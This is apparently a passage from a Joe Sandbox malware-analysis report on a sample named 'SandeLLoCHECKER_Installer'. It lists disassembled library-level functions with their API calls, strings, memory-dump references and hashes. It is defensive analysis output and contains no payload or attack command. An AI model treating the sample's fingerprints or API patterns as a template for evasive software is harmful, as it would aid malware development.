                                                                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0088639E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                        • String ID: bad locale name
                                                                                                                        • API String ID: 3988782225-1405518554
                                                                                                                        • Opcode ID: e64d65300becd52f7d46d8690526208ff9262f1d84a9b01834b0e8b7cab3fea4
                                                                                                                        • Instruction ID: 662a829eaf81734180154d0d3bab588d1d599a182e83e192b5fcd675198e585c
                                                                                                                        • Opcode Fuzzy Hash: e64d65300becd52f7d46d8690526208ff9262f1d84a9b01834b0e8b7cab3fea4
                                                                                                                        • Instruction Fuzzy Hash: CB21DE70A05784DED721CF68C90474BBBE4AF15714F14869EE445C7B81D7B5AA08C7A1
                                                                                                                        Function 00A131B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • VirtualQuery.KERNEL32(80000000,00A130FA,0000001C,00A132EF,00000000,?,?,?,?,?,?,?,00A130FA,00000004,00B2F954,00A1337F), ref: 00A131C6
                                                                                                                        • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00A130FA,00000004,00B2F954,00A1337F), ref: 00A131E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoQuerySystemVirtual
                                                                                                                        • String ID: D
                                                                                                                        • API String ID: 401686933-2746444292
                                                                                                                        • Opcode ID: f6547e6262ddb08602da84ddd9944797788a6809de9d77cf87a0df59b3b12f77
                                                                                                                        • Instruction ID: 89930cdf3a5a563fac428da191b1c688a91c60063a2f664ff3dbb16f4470d80f
                                                                                                                        • Opcode Fuzzy Hash: f6547e6262ddb08602da84ddd9944797788a6809de9d77cf87a0df59b3b12f77
                                                                                                                        • Instruction Fuzzy Hash: 1E01F773700109ABCF14DF69DC05BDD7BAAAFC5324F1CC221EE19D7244EA34D9428680
                                                                                                                        Function 00A20092 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __alldvrm.LIBCMT ref: 00A200AF
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A200D4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Unothrow_t@std@@@__alldvrm__ehfuncinfo$??2@
                                                                                                                        • String ID: Df
                                                                                                                        • API String ID: 3107155309-381112559
                                                                                                                        • Opcode ID: 62f07188e76c5965496c506f9e2b439d44607c8f5dc6f1a37caf7df8bfbe0a86
                                                                                                                        • Instruction ID: 24785fe06cc160fd5fec33cb30f8a9472f6dfec98b07f1b3ae0f9b898319a68a
                                                                                                                        • Opcode Fuzzy Hash: 62f07188e76c5965496c506f9e2b439d44607c8f5dc6f1a37caf7df8bfbe0a86
                                                                                                                        • Instruction Fuzzy Hash: 14F05277644204BFDB202B91AC86F8FBB6EDBC8765F244020B208E72A0D9719C0093A4
                                                                                                                        Function 008689AF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetParent.USER32(0000000F), ref: 008689E2
                                                                                                                        Strings
                                                                                                                        • C:\ReleaseAI\stubs\setup\controls\generic\VisualStyleBorder.h, xrefs: 008689C7
                                                                                                                        • Unknown exception, xrefs: 008689B7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Parent
                                                                                                                        • String ID: C:\ReleaseAI\stubs\setup\controls\generic\VisualStyleBorder.h$Unknown exception
                                                                                                                        • API String ID: 975332729-9186675
                                                                                                                        • Opcode ID: 06095d424a36f16296aafd9343f637ad9960bd6b9f2ed011bccd653fcf003670
                                                                                                                        • Instruction ID: e7f32b49dd56546893dfdb05284df2ee2b8efb686852d7c20b441f18089eee81
                                                                                                                        • Opcode Fuzzy Hash: 06095d424a36f16296aafd9343f637ad9960bd6b9f2ed011bccd653fcf003670
                                                                                                                        • Instruction Fuzzy Hash: BB015E30D0128CEFDB00EBE8C915ADDBBB0FF15304F548498E042AB286DBB45A48DB92
                                                                                                                        Function 00853BEE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp, xrefs: 00853C06
                                                                                                                        • Unknown exception, xrefs: 00853BF6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ActiveWindow
                                                                                                                        • String ID: C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp$Unknown exception
                                                                                                                        • API String ID: 2558294473-2631306498
                                                                                                                        • Opcode ID: 87d67dc8a9e1ec5ecfe16405af32dfb942de506cd5010d21dec71be7062feb6a
                                                                                                                        • Instruction ID: 7a9c1958f208312ae4db13938d6682e444cf8f3d2cc340237dfd2ca2ea9a2cdc
                                                                                                                        • Opcode Fuzzy Hash: 87d67dc8a9e1ec5ecfe16405af32dfb942de506cd5010d21dec71be7062feb6a
                                                                                                                        • Instruction Fuzzy Hash: 01014C30D0628CEEDF05EBE8C915BDDBBB0BF55304F548498E442AB286DBB45B08D792
                                                                                                                        Function 00A155C4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0085A4A0: InitializeCriticalSectionAndSpinCount.KERNEL32(00B2FDD0,00000000,C7BA013E,00840000,Function_001FDE90,000000FF,?,00A155F3,?,?,?,008475C6), ref: 0085A4C5
                                                                                                                          • Part of subcall function 0085A4A0: GetLastError.KERNEL32(?,00A155F3,?,?,?,008475C6), ref: 0085A4CF
                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,008475C6), ref: 00A155F7
                                                                                                                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,008475C6), ref: 00A15606
                                                                                                                        Strings
                                                                                                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00A15601
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CountCriticalDebugDebuggerErrorInitializeLastOutputPresentSectionSpinString
                                                                                                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                        • API String ID: 450123788-631824599
                                                                                                                        • Opcode ID: 77f698fc39b123303142036777994ac411ff54c313c4c234aa9f7d58453f762f
                                                                                                                        • Instruction ID: b1b6e96592e1ce107732ab6e0e50b9ffa37b350949dfe83c84b84c50ab1892c3
                                                                                                                        • Opcode Fuzzy Hash: 77f698fc39b123303142036777994ac411ff54c313c4c234aa9f7d58453f762f
                                                                                                                        • Instruction Fuzzy Hash: 04E06D70600B418FD330AFB8E544796BBE4AF44708F54892DE896C3680EBB5D489CBA1